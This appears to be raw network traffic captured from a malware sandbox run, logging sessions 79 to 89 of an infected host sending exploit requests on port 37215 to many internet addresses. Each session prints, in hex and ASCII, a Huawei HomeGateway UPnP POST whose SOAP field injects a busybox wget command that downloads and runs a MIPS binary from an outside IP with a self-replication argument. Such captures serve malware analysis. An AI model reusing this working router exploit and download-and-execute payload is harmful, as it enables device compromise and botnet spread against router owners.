                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          79192.168.2.2359592157.217.217.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124450922 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          80192.168.2.235110841.64.55.10437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124453068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          81192.168.2.2356044157.228.94.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124476910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          82192.168.2.2340848197.140.202.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124505997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          83192.168.2.2341040189.84.251.11037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124521017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          84192.168.2.2346530157.103.216.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124584913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          85192.168.2.2350568157.75.210.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124587059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          86192.168.2.2358820157.82.118.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124592066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          87192.168.2.2353202148.234.42.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124599934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          88192.168.2.2356254197.115.60.7837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124650002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          89192.168.2.2352692119.193.17.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.124650002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
